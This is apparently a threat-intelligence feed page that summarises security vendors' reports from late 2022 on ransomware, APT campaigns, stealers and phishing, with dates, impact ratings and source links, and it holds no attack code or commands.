- MEDIUM
- Summary:
- Researchers from Symantec have identified that a cyberespionage threat actor tracked as Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) has been running a campaign targeting a certificate authority, government agencies, and defense organizations in several countries in Asia.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_SharpPanda_APT_Group
- Date of Scan:
- 2022-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of the SharpPanda APT group. SharpPanda APT attacks and targets Southeast Asian government users with template injection of malicious documents. The attackers use spear-phishing to gain initial access and leverage old Microsoft Office vulnerabilities together with a chain of in-memory loaders to attempt to install a previously unknown backdoor on the victims’ machines.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-apt-group-active-iocs
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Phobos_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Phobos ransomware. It is based on the Dharma malware that first appeared at the beginning of 2019.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-phobos-ransomware-active-iocs-27
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Deep_Examination_of_Prestige_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have analyzed the Prestige Ransomware.
Source:
https://www.cyfirma.com/outofband/prestige-ransomware-analysis/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Black_Basta_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Black Basta Ransomware. It is a new ransomware that encrypts data stored on clients’ hard drives.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-black-basta-ransomware-active-iocs-5
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Earth_Longzhi_APT_Targeting_Ukraine_and_Asian_Countries
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have observed the threat group Earth Longzhi targeting Ukraine and Asian countries with custom Cobalt Strike loaders.
—
- Intel Source:
- Cyble
- Intel Name:
- Indonesian_BRI_Bank_targeted_by_phishing_campaigns
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- VMware Carbon Black Managed Detection and Response (MDR) analysts have identified a threat that has been circulating over the last couple of months: BatLoader. BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The analysts shared their analysis of this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.
Source:
https://blog.cyble.com/2022/11/15/phishing-campaign-targeting-indonesian-bri-bank-using-sms-stealer/
—
- Intel Source:
- Sucuri
- Intel Name:
- Massive_oisDOTis_Black_Hat_Redirect_Malware_Campaign
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have identified the ois[.]is black hat redirect malware campaign. These malicious redirects appear to be designed to increase the authority of the attacker’s sites for search engines.
Source:
https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
—
- Intel Source:
- Talos
- Intel Name:
- Cyber_adoption_of_IPFS_for_different_malware_campaigns
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- Dropper_Type_Malware_Bomb_Back_Again
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- ASEC researchers found that dropper malware, which disguised itself as a crack, is being actively distributed again. Once the malware is executed, the affected system becomes infected with numerous malware programs.
—
- Intel Source:
- QuickHeal
- Intel Name:
- QBOT_Leveraging_HTML_Smuggling_Technique
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from QuickHeal have observed a new technique that QBot leverages for its attack. It is called an “HTML Smuggling attack.”
Source:
https://blogs.quickheal.com/qbot-a-html-smuggling-technique-to-target-victims/
—
- Intel Source:
- Akamai
- Intel Name:
- New_KmsdBot_Malware_Hijacking_Systems
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from Akamai have identified a newly discovered evasive malware that leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks.
Source:
https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware
—
- Intel Source:
- DCSO CyTec Blog
- Intel Name:
- StrelaStealer_and_IceXLoader_Drive_InfoStealing_Campaigns
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from DCSO CyTec have discovered new waves of malware campaigns, with two information-stealing malware families making the rounds in the wild. Named StrelaStealer and IceXLoader, both malware families leverage malicious email attachments to lure their targets.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0118_Group_Using_Somnia_Malware
- Date of Scan:
- 2022-11-11
- Impact:
- MEDIUM
- Summary:
- Researchers from CERT-UA have investigated threat group FRwL (aka Z-Team) and found that the initial compromise occurred as a result of downloading and running a file that mimicked the “Advanced IP Scanner” software, but actually contained the Vidar malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Bypassing_MOTW
- Date of Scan:
- 2022-11-11
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the script format found from September 8th to September 29th, 2022, bypassed Mark of the Web (MOTW), a feature offered by Microsoft that identifies the source of files.
—
- Intel Source:
- Cyble
- Intel Name:
- The_return_of_Emotet_targeting_users_worldwide
- Date of Scan:
- 2022-11-10
- Impact:
- HIGH
- Summary:
- Cyble Research and Intelligence Labs (CRIL) observed the recent Emotet spam campaign spreading malicious xls, xlsm, and password-protected zip files as attachments to infect users. These Office documents contain malicious macro code which downloads the actual Emotet binary from a remote server. Cyble intelligence shows that the recent Emotet campaign is widespread worldwide, targeting 40 countries. This latest strain is spreading Bumblebee and IcedID malware.
Source:
https://blog.cyble.com/2022/11/09/emotet-returns-targeting-users-worldwide/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Another_malicious_VisualBasic_script
- Date of Scan:
- 2022-11-10
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a malicious VisualBasic script that attracted their attention. It’s not flagged as malicious but, even more, it’s reported as a simple malicious script.
Source:
https://isc.sans.edu/diary/Another%20Script-Based%20Ransomware/29234
—
- Intel Source:
- Zimperium
- Intel Name:
- The_deep_details_of_Cloud9_Chrome_Botnet
- Date of Scan:
- 2022-11-10
- Impact:
- LOW
- Summary:
- The Zimperium Labs researchers recently discovered a malicious browser extension that steals the information available during the browser session, installs malware on a user’s device, and subsequently assumes control of the entire device. The team provided a deeper analysis of the architecture and modus operandi of this malicious browser extension, originally called Cloud9 by the malware author.
Source:
https://www.zimperium.com/blog/the-case-of-cloud9-chrome-botnet/
—
- Intel Source:
- Sophos
- Intel Name:
- The_repeated_use_of_DLL-hijack_execution
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Sophos researchers have observed multiple attacks targeting government organizations in Asia involving DLL sideloading, one of the most common techniques of China-based APT groups. They shared the evidence of the connection between the incidents and showed how threat actors base their attacks on well-known, effective techniques, adding complexity and variation over time.
Source:
https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_LockBit_3.0_Being_Distributed_by_Amadey_Bot
- Date of Scan:
- 2022-11-09
- Impact:
- MEDIUM
- Summary:
- The ASEC analysis team has observed and confirmed that attackers are using Amadey Bot to install LockBit. Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker.
—
- Intel Source:
- Cyble
- Intel Name:
- Modified_Chaos_Ransomware_Killnet_in_the_wild
- Date of Scan:
- 2022-11-09
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble discovered data-destructive ransomware related to the pro-Russian Threat Actor (TA) organization “Killnet”. The ransomware drops a note directing victims to a Telegram page for supporting Russian hacktivists. The ransomware is seen targeting multiple adversaries across the globe.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Diving_Deep_into_DeimosC2_C&C_Framework
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have analyzed the technical details of DeimosC2 C&C framework.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_analyses_of_malicious_use_of_multiple_intermittent_.NET_binaries
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- FortiGuard Labs recently analyzed a fake phishing email that drops the Warzone RAT and showed that it does so using multiple intermittent .NET binaries that are increasingly obfuscated.
—
- Intel Source:
- Minerva-labs
- Intel Name:
- A_new_updated_IceXLoader_malware
- Date of Scan:
- 2022-11-09
- Impact:
- MEDIUM
- Summary:
- IceXLoader was discovered earlier this year. It is a commercial malware used to download and deploy additional malware on infected machines. While the version discovered in June was v3.0, Minerva Labs researchers recently observed a newer v3.3.3 loader, which looks to be fully functional and includes a multi-stage delivery chain.
Source:
https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/
—
- Intel Source:
- Any.Run
- Intel Name:
- Raccoon_stealer_2.0_malware_analysis
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Any.Run analysts triaged multiple Raccoon stealer V2 samples, collected typical behavior activities, and briefly described its execution process. They also provided a deeper and more detailed Raccoon stealer 2.0 malware analysis to follow all steps and get a complete picture of the info stealer’s behavior.
Source:
https://thehackernews.com/2022/11/inside-raccoon-stealer-v2.html
https://any.run/malware-trends/raccoon?utm_source=hacker_news&utm_medium=article&utm_campaign=raccoon&utm_content=mtt
—
- Intel Source:
- Any.Run
- Intel Name:
- FormBook_stealer
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Any.Run analysts recorded a malware analysis session that allows an in-depth look at the behavior of this clever virus and of other malware such as Dridex and Lokibot with their elaborate anti-evasion techniques.
—
- Intel Source:
- Sucuri
- Intel Name:
- The_analyses_of_Black_Hat_redirect_campaign
- Date of Scan:
- 2022-11-09
- Impact:
- LOW
- Summary:
- The Sucuri research team has tracked a surge in WordPress malware redirecting website visitors to fake sites run by attackers. They showed in their analysis what this infection does and how the malicious redirects work.
Source:
https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_expansion_of_SocGholish_malware
- Date of Scan:
- 2022-11-08
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne discovered that the SocGholish operators are expanding their infrastructure for staging malware with new servers. This helps the operators to counter defensive operations against known servers and scale up their operation.
—
- Intel Source:
- AbnormalSecurity
- Intel Name:
- Crimson_Kingsnake_threat_impersonation
- Date of Scan:
- 2022-11-08
- Impact:
- LOW
- Summary:
- The researchers discovered a new BEC group that uses impersonation tactics to swindle companies around the world. The group, called Crimson Kingsnake, impersonates real attorneys, law firms, and debt recovery services to deceive accounting professionals into quickly paying bogus invoices. They also observed Crimson Kingsnake targeting companies throughout the United States, Europe, the Middle East, and Australia.
Source:
https://abnormalsecurity.com/blog/crimson-kingsnake-bec-group-attacks
—
- Intel Source:
- IronNet
- Intel Name:
- Robin_Banks_Phishing_Service_Back_to_Steal_Banking_Accounts
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from IronNet have identified that the Robin Banks phishing-as-a-service (PhaaS) platform is back in action with infrastructure hosted by a Russian internet company that offers protection against distributed denial-of-service (DDoS) attacks.
Source:
https://www.ironnet.com/blog/robin-banks-still-might-be-robbing-your-bank-part-2
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Windows_Malware_with_VHD_Extension
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a phishing email with an attachment and found that the attachment is presented as a PDF but is in fact a VHD file.
Source:
https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Remcos_Downloader_with_Unicode_Obfuscation
- Date of Scan:
- 2022-11-07
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious RAR archive containing a VBS script. It was called “Unidad judicial citacion pendiente Fiscalia.rar” and protected with a simple 4-digit password to defeat automatic scanning. The same name appears inside the VBS script.
—
- Intel Source:
- Zscaler
- Intel Name:
- APT36_Targeting_Indian_Governmental_Organizations
- Date of Scan:
- 2022-11-07
- Impact:
- MEDIUM
- Summary:
- According to Zscaler researchers, APT-36 (also known as Transparent Tribe) targets users working at Indian government organizations with updated TTPs and tools.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Laplas_Clipper_Malware_distributed_through_SmokeLoader
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from Cyble identified a new attack technique leveraging SmokeLoader to load various malware into the target system, compromised through spam emails. The campaign seems to be highly active in the wild, using Laplas Clipper to target cryptocurrency users.
Source:
https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/
—
- Intel Source:
- Blackberry
- Intel Name:
- The_threat_actor_RomCom_new_attacks
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- The BlackBerry Threat Research and Intelligence team shed light on RomCom’s new attack campaigns spoofing legitimate network scanning tools through phishing and spoofed domains, targeting Ukraine and English-speaking countries and delivering the RomCom RAT.
Source:
https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass
—
- Intel Source:
- Securonix
- Intel Name:
- Apache_Commons_Text4Shell_Vulnerability
- Date of Scan:
- 2022-11-04
- Impact:
- MEDIUM
- Summary:
- Securonix researchers have analyzed the Apache Commons Text library vulnerability that is currently being exploited. On October 13, Apache Software Foundation was notified of a Text4shell vulnerability affecting versions 1.5 to 1.9. It has been patched in version 1.10.0.
Source:
https://www.securonix.com/blog/apache-commons-text4shell/
—
- Intel Source:
- VMware
- Intel Name:
- Ransomware_targeting_ESXi
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from VMware’s Threat Analysis Team shared details about various ransomware families targeting enterprises that run VMware ESXi, along with their techniques and tactics.
—
- Intel Source:
- SentinelOne
- Intel Name:
- New_Black_Basta_Ransomware_Tools_and_tactics
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Sentinel Labs researchers shed light in depth on the operational TTPs of the highly evasive Black Basta ransomware, which they link to FIN7 or one of its developers, exposing previously undiscovered tools and tactics.
—
- Intel Source:
- ESentire
- Intel Name:
- Raise_in_Chromeloader_Malware_attacks
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from ESentire discovered the latest traces of Chromeloader Malware being spread in the wild. The malware seems more persistent, promising higher permissions on the target’s system.
Source:
https://www.esentire.com/blog/chromeloader-observations-on-the-rise
—
- Intel Source:
- Group-IB
- Intel Name:
- OPERA1ER_APT_Hackers_attacks
- Date of Scan:
- 2022-11-04
- Impact:
- LOW
- Summary:
- Researchers from Group-IB have identified that a French-speaking threat actor named OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022.
—
- Intel Source:
- PaloAlto
- Intel Name:
- A_Guloader_variant_techniques
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Unit 42 researchers observed a new Guloader variant that contains a shellcode payload protected by anti-analysis techniques. Their purpose is to slow human analysts and sandboxes processing this sample.
Source:
https://unit42.paloaltonetworks.com/guloader-variant-anti-analysis/
—
- Intel Source:
- Symantec
- Intel Name:
- Cranefly_Hackers_Installing_Undocumented_Malware
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Symantec researchers have discovered that an unknown dropper is being used to install a new backdoor and other tools by reading commands from seemingly innocuous Internet Information Services (IIS) logs.
—
- Intel Source:
- ASEC
- Intel Name:
- Elbie_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Using internal monitoring, ASEC researchers have discovered that ieinstal.exe is being used in the distribution of Elbie ransomware.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Techniques_used_by_notorious_banking_Trojans
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Palo Alto analysts summarized techniques used by notorious banking Trojan families to evade detection, steal sensitive data and manipulate data. They also describe how those techniques can be blocked. These families include Zeus, Kronos, Trickbot, IcedID, Emotet and Dridex.
Source:
https://unit42.paloaltonetworks.com/banking-trojan-techniques/
—
- Intel Source:
- ASEC
- Intel Name:
- Surtr_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[[email protected]].[ ].Surtr” file extension to the original file extension name.
—
- Intel Source:
- Wordfence
- Intel Name:
- The_Fox_Hack_malicious_functions
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- The Wordfence threat analysts recently discovered the latest version of a Command and Control (C2) script, which is referred to as F-Automatical within the script’s code and was commonly known as FoxAuto in older versions. This version of the automatic C2 script is developed and distributed by a threat group called Anonymous Fox. The script allows for anything from simple information-stealing attacks up to full site takeover, and more.
—
- Intel Source:
- SecurityAffairs
- Intel Name:
- Ignoring_of_old_Wannacry_ransomware
- Date of Scan:
- 2022-11-03
- Impact:
- MEDIUM
- Summary:
- In May 2017, the world learned about a global security attack, the Wannacry ransomware, carried out through malicious code capable of encrypting data residing in information systems and demanding a ransom in cryptocurrency to restore them. That attack was considered to be the worst cyber attack in terms of contamination rate and scope, putting public offices and companies (especially healthcare facilities) out of operation. Despite this, some companies still haven’t learned the lesson and continue to ignore it.
Source:
https://securityaffairs.co/wordpress/137894/cyber-crime/wannacry-hybrid-malware.html
—
- Intel Source:
- ASEC
- Intel Name:
- Appleseed_Malware_Spreading_to_Nuclear_Power_Plant_Companies
- Date of Scan:
- 2022-11-03
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that AppleSeed has been distributed to nuclear power plants. Kimsuky, a North Korean affiliated organization, is actively distributing AppleSeed, a backdoor malware, to many companies.
—
- Intel Source:
- Securelist
- Intel Name:
- The_observation_of_public_cloud_services_attacks
- Date of Scan:
- 2022-11-03
- Impact:
- MEDIUM
- Summary:
- Kaspersky has reported several incidents where attackers used cloud services for C&C. Their report describes several interesting incidents involving server-side attacks, C&C in public clouds and other MDR cases.
Source:
https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/
—
- Intel Source:
- VMware
- Intel Name:
- ShadowPad_malware_analyses
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- VMware researchers have discovered active ShadowPad C2s on the Internet by analyzing the command and control (C2) protocol.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- Vulnerable_Docker_and_Kubernetes_Infrastructure_targeted_by_a_Kiss-a-Dog_Cryptojacking_Campaign
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- The CrowdStrike team has identified a new cryptojacking campaign called “Kiss-a-dog” that targets vulnerable Docker and Kubernetes infrastructures. The campaign uses an obscure domain for the payload, container escape attempts, and anonymized dog mining pools to target Docker and Kubernetes infrastructures.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Transformation_of_DarkVNC_from_VNC
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- A team of researchers from SANS have analyzed Virtual Network Computing (VNC), which is a method for controlling a computer remotely. In addition, VNC is a cross-platform screen-sharing system that allows full keyboard and visual control of a remote computer as if you were physically present.
—
- Intel Source:
- DFIRReport
- Intel Name:
- Follina_Vulnerability_triggering_Qbot_infection_chain_compromising_Domain
- Date of Scan:
- 2022-11-02
- Impact:
- LOW
- Summary:
- The DFIR Report researchers discovered an intrusion using the Follina Vulnerability for Initial Access that caused Qbot infection, compromised the entire domain, launched several payloads, and evaded detection.
Source:
https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
—
- Intel Source:
- Trustwave
- Intel Name:
- An_increase_in_threats_packaged_in_password_protected_archives
- Date of Scan:
- 2022-11-01
- Impact:
- LOW
- Summary:
- Trustwave labs discovered a rise in threats packaged in password-protected archives, with about 96% of these being spammed by the Emotet botnet. The team also noticed an interesting attachment in this spam campaign: disguised as an invoice, the attachment, in either ZIP or ISO format, contained a nested self-extracting (SFX) archive.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_payload_for_NetSupport_RAT_from_the_sczriptzzbn_inject
- Date of Scan:
- 2022-11-01
- Impact:
- LOW
- Summary:
- This month researchers from SANS have been seeing a payload for NetSupport RAT from the sczriptzzbn inject. This injected script causes a fake browser update page to appear in the victim’s browser.
—
- Intel Source:
- MalwareBytes
- Intel Name:
- The_remote_desktop_services_targeted_by_Venus_ransomware
- Date of Scan:
- 2022-11-01
- Impact:
- LOW
- Summary:
- Malwarebytes researchers shared that the threat actors behind the relatively new Venus ransomware are hacking into publicly exposed Remote Desktop services to encrypt Windows devices.
Source:
https://www.malwarebytes.com/blog/news/2022/10/venus-ransomware-targets-remote-desktop-services
—
- Intel Source:
- Microsoft
- Intel Name:
- The_Raspberry_Robin_worm_recent_activity
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- Researchers from Microsoft have noted recent activity for the Raspberry Robin worm which links it to other malware families and to alternate infection methods beyond its original USB drive spread. These infections lead to follow-on hands-on-keyboard attacks and human-operated ransomware activity. Microsoft’s monitoring of Raspberry Robin activity also shows it is a very active operation: Microsoft Defender for Endpoint data indicates that nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related alert in the last 30 days.
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_rise_of_BlackCat_ransomware
- Date of Scan:
- 2022-10-31
- Impact:
- MEDIUM
- Summary:
- The BlackCat ransomware has recently been very successful in attacks on high-profile companies, and it uses triple extortion, threatening to expose exfiltrated data. Ransomware actors that use triple extortion also threaten to launch distributed denial-of-service (DDoS) attacks on their victims’ infrastructure to coerce them into paying the ransom.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackcat
—
- Intel Source:
- ASEC
- Intel Name:
- AgentTesla_Being_Distributed_via_VBS
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- The ASEC analysis team has recently identified that AgentTesla is being distributed through a malicious VBS. The script file contains multiple pieces of code that have been obfuscated multiple times. AgentTesla was found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Attack_Group_Disabling_Anti-Malware_Programs_With_the_BYOVD_Technique
- Date of Scan:
- 2022-10-31
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have identified malware infections in which the Lazarus attack group disables anti-malware programs with the BYOVD technique.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Qakbot_evolves_intrusion_by_leveraging_valid_code_signing
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro extensively researched Qakbot evolving into more intrusive malware leveraging valid code signing through excel macros and .dll files. Qakbot has been seen enumerating and dumping certificates and private keys since July.
—
- Intel Source:
- Securelist
- Intel Name:
- The_Growth_of_LODEINFO_backdoor_shellcode
- Date of Scan:
- 2022-10-31
- Impact:
- LOW
- Summary:
- Securelist researchers have identified that LODEINFO shellcode was regularly updated for use with each infection vector. The developer of LODEINFO v0.5.6 has implemented three new backdoor commands that enhance evasion techniques for certain security products.
Source:
https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-ii/107745/
—
- Intel Source:
- Medium
- Intel Name:
- The_update_of_Brute_Ratel_decryption
- Date of Scan:
- 2022-10-28
- Impact:
- LOW
- Summary:
- The developer released his notes with the addition of a change to a dynamic key instead of the hardcoded key everyone refers to. The hardcoded key is still used and exists for decrypting some of the strings on board.
Source:
https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb
—
- Intel Source:
- Fortinet
- Intel Name:
- Warzone_RAT_Delivering_via_Fake_Hungarian_Government_Email
- Date of Scan:
- 2022-10-28
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGuard have discovered an email pretending to come from the Hungarian government. It includes an attachment that is a zipped executable that, upon execution, extracts the Warzone RAT to memory and runs it.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- C2_Communications_Through_outlook
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a malicious Python script that exchanges information with its C2 server through emails.
Source:
https://isc.sans.edu/diary/C2+Communications+Through+outlookcom/29180/
—
- Intel Source:
- 360Netlab
- Intel Name:
- Fodcha_Botnet_is_Back_With_New_Version
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- Researchers from 360Netlab have observed that the Fodcha botnet has been updated to a new version in which the operator redesigned the communication protocol and started using the XXTEA and ChaCha20 algorithms to encrypt sensitive resources and network communication, in order to avoid detection at the file and traffic level.
Source:
https://blog.netlab.360.com/ddosmonster_the_return_of__fodcha_cn/
—
- Intel Source:
- ASEC
- Intel Name:
- FormBook_InfoStealer_Being_Distributing_as_DotNet
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- ASEC researchers have identified FormBook malware that is downloaded to the system and executed while the user is using a web browser. It is an info-stealer that aims to steal the user’s web browser login information, keyboard input, clipboard contents, and screenshots.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Malware_Spreading_Rapidly_in_Korea
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Qakbot malware is being distributed to Korean users. It uses ISO files, similar to the previous version, but a step to bypass behavior detection has been added.
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiner_Leveraging_Vulnerable_Apache_Tomcat_Web_Server
- Date of Scan:
- 2022-10-27
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified the attacks that are targeting vulnerable Apache Tomcat web servers.
—
- Intel Source:
- ASEC
- Intel Name:
- Deep_Analysis_of_Attack_Techniques_and_Cases_Using_RDP
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed attack techniques and cases involving RDP (Remote Desktop Protocol). RDP is commonly used in most attacks because it is useful for initial compromise or lateral movement, compared to remote control tools that require an additional installation process.
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_Amadey_Bot_malware
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- The Korea Internet & Security Agency shared a notice, “Advising Caution on Cyber Attacks Exploiting the Kakao Service Malfunction Issue”, with details of malware that pretends to be a KakaoTalk installation file (KakaoTalkUpdate.zip etc.) and is being distributed by email. The ASEC analysis team obtained the relevant samples and found that the malware has the same filename and icon as the actual messenger program, which prompts ordinary users to launch it.
—
- Intel Source:
- TrendMicro
- Intel Name:
- LV_Ransomware_Leveraging_ProxyShell_to_Attack
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have identified ransomware as a service (RaaS) named LV Ransomware which is exploiting ProxyShell in an attack on a Jordan-based company.
Source:
https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
—
- Intel Source:
- Guardio
- Intel Name:
- Malicious_Extension_Dormant_Colors
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from Guardio Security have identified the Dormant Colors malicious extension campaign, with millions of active installations worldwide. At least 30 variants of this extension, for both Chrome and Edge, are part of the campaign and are freely available in the respective stores.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Scammers_Impersonating_Multiple_Brands_for_Phishing_Attack
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have analyzed phishing campaigns and identified the top brands most frequently imitated by criminals attempting to steal individuals’ personal information or payment credentials during July, August, and September.
—
- Intel Source:
- ASEC
- Intel Name:
- Evolution_of_Magniber_Ransomware
- Date of Scan:
- 2022-10-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the Magniber ransomware files distributed in each time period. In the month of September alone, the file format changed up to four times (cpl -> jse -> js -> wsf -> msi). Frequent changes were also made to the injection method, the UAC bypass, and the deactivation of the Windows 10 recovery environment, for the purpose of bypassing detection.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Analysis_of_Malicious_RTF_Files
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed malicious RTF files.
Source:
https://isc.sans.edu/diary/rtfdumps+Find+Option/29174/
—
- Intel Source:
- CISA
- Intel Name:
- US_Government_warns_of_Daixin_Team_Targeting_Health_sector_with_Ransomware
- Date of Scan:
- 2022-10-25
- Impact:
- MEDIUM
- Summary:
- The Daixin Team is a ransomware and data extortion group that has targeted the HPH sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Web_Skimmers_Still_Active
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
- PaloAlto researchers have analyzed the latest trends of web threats such as host and landing URLs, including where they are hosted, what categories they belong to, and which malware families pose the most threats.
Source:
https://unit42.paloaltonetworks.com/web-threat-trends-web-skimmer/
—
- Intel Source:
- Zscaler
- Intel Name:
- SideWinder_APT_Using_New_WarHawk_Backdoor
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have identified that the SideWinder APT uses WarHawk malware to target entities in Pakistan.
Source:
https://www.zscaler.com/blogs/security-research/warhawk-new-backdoor-arsenal-sidewinder-apt-group-0
